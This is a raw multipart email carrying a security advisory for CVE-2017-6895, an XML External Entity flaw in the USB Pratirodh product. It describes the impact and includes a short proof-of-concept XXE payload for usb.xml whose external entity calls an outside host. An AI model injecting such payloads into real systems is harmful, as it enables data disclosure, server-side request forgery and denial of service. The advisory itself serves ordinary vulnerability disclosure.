--001a113ff018269a92054ac84a6a Content-Type: text/plain; charset=UTF-8 Vulnerability Title: USB Pratirodh XML External Entity Injection Vulnerability Affected Product: USB Pratirodh Product Homepage: https://cdac.in/index.aspx?id=cs_eps_usb_pra CVE-ID : CVE-2017-6895 Severity: Medium Class: XXE [CWE-611] Impact: XML External Entity, Information Disclosure, Denial Of Service, Author: Sachin Wagh (@tiger_tigerboy) *Description:* USB Pratirodh is prone to an XML External Entity injection vulnerability. XXE attack is an attack on an application that parses XML input from untrusted sources using incorrectly configured XML parser. This attack may lead to the disclosure of confidential data, denial of service, server side request forgery, port scanning from the perspective of the machine where the parser is located, and other system impacts. Proof of Concept: Added below code after xml tag in to the usb.xml file. ** * " >]>&xxe;* *Reference:* https://secur1tyadvisory.wordpress.com/2017/03/15/usb-pratirodh-xml-external-entity-injection-vulnerability/ *Credit:* *Sachin Wagh (@tiger_tigerboy)* --001a113ff018269a92054ac84a6a Content-Type: text/html; charset=UTF-8 Content-Transfer-Encoding: quoted-printable
Vulnerability Title: USB Pratirodh XML External Entity Injection Vulne= rability
Affected Product: USB Pratirodh
CVE-ID : CVE-2017-6895
Severity: Medium
Class: XXE =C2=A0[CWE-611]
Impact:= XML External Entity, Information Disclosure, Denial Of Service,
Author: Sachin Wagh (@tiger_tigerboy)
Description:

USB Pratirodh is prone to an XML External Entity injectio= n vulnerability.
XXE attack is an attack on an applic= ation that parses XML input from untrusted sources using incorrectly config= ured XML parser. This attack may lead to the disclosure of confidential dat= a, denial of service, server side request forgery, port scanning from the p= erspective of the machine where the parser is located, and other system imp= acts.
Proof of Concept:

Added below code after xml tag in to the usb.xml file.<= /div>

<!DOCTYPE foo [=C2= =A0
=C2=A0<!ELEMENT foo ANY >
<= div dir=3D"ltr">=C2=A0<!ENTITY xxe SYSTEM "http://tigerboy.com/XXE" >]><foo>&x= xe;</foo>
=C2=A0
R= eference:


Credit:

Sachin Wagh (@tiger_tigerb= oy)

--001a113ff018269a92054ac84a6a--